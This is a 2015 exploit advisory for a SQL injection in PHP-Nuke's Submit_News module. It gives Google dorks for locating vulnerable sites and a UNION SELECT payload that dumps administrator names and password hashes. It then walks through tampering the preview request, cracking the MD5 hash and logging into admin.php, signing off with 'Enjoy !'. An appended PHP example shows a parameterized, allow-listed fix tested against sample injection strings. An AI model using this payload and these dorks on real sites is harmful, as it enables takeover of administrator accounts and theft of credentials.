
PHP-Nuke Submit_News SQL Injection Vulnerability

Author: Iran Cyber Security Group, Published: 08-06-2015
# Exploit Title : PHP-Nuke Submit_News SQL Injection Vulnerability

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : root3r & KamraN HellisH

# Contact : root3r.blackhat@gmail.com & root3r.blackhat@hotmail.com

# Software Link : www.phpnuke.ir & www.phpnuke.com

# Version : All Versions

# Category : Web Application Bugs

# Dorks :
inurl:// /modules/Submit_News/index.php
inurl:// /modules/MT-Gallery/copyright.php
inurl:// /modules/Your_Account/index.php
inurl:// /modules/Web_Links/index.php
inurl:// /blocks/block-CZUser-Info.php
inurl:// /ultramode.txt
PHP-Nuke Project By PHPNuke.ir 13
Designed by : MrNuke
inurl:/modules.php?name=Submit_News

# Tested On : Windows

# Home : Iran-Cyber.Org

PoC :

Change The URL To : " site.com/modules.php?name=Submit_News " Then Run The Tamper Data Add-On And Click Start Tamper.

Choose A Category For The Post And Type Anything You Want In The Fields And Then Click Preview.

Tamper The Outgoing Data With Tamper Data, Then Edit The Topic Number To:

-<topicnumber>' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+

And Click Ok To Send Edited Data To The Server. In The Preview Of Post You Will See The Admin Username And The Hashed Password.

Then Crack The MD5 Hash By http://www.hashkiller.co.uk/md5-decrypter.aspx Or Other Software To Get The Password. Then Go To The Admin Page And Login.

Admin Page Url Is : site.com/admin.php

Enjoy !

Thanks To : MOHAMAD NOFOZI - Sheytan Azzam - WH!T3 W01F - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group
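
On the defensive side, the PoC above works because the topic number from the preview form reaches the SQL query as text. The following is an added example, not part of the original advisory and not PHP-Nuke source, showing the value being allow-listed and bound as an integer parameter; the `nuke_topics` table, its columns and the function names are assumptions, and in-memory SQLite (pdo_sqlite) stands in for the site's MySQL database.

```php
<?php
// Added example, not PHP-Nuke source. nuke_topics, its columns and the
// function names are assumptions; in-memory SQLite stands in for MySQL.
declare(strict_types=1);

function make_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE nuke_topics (topicid INTEGER PRIMARY KEY, topictext TEXT)');
    $pdo->exec("INSERT INTO nuke_topics VALUES (1, 'News'), (2, 'Security')");
    return $pdo;
}

// Returns the topic row for a submitted value, or null when the value is
// rejected or no such topic exists.
function lookup_topic(PDO $pdo, $raw): ?array
{
    // Allow-list check: digits only, bounded length. Quotes, signs, spaces,
    // SQL keywords and array-valued parameters never get past this point.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    // The value is bound as an integer parameter, so it is never parsed as
    // part of the SQL text even if the check above is later loosened.
    $stmt = $pdo->prepare(
        'SELECT topicid, topictext FROM nuke_topics WHERE topicid = :id'
    );
    $stmt->bindValue(':id', (int) $raw, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample inputs for the topic field of the preview form.
$pdo = make_demo_db();
$samples = ['2', "-1' UNION SELECT 1,2-- ", '2 OR 1=1', '', '99', ['2']];
foreach ($samples as $raw) {
    $row = lookup_topic($pdo, $raw);
    printf("%-28s => %s\n", json_encode($raw), $row ? $row['topictext'] : 'rejected or unknown');
}
```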
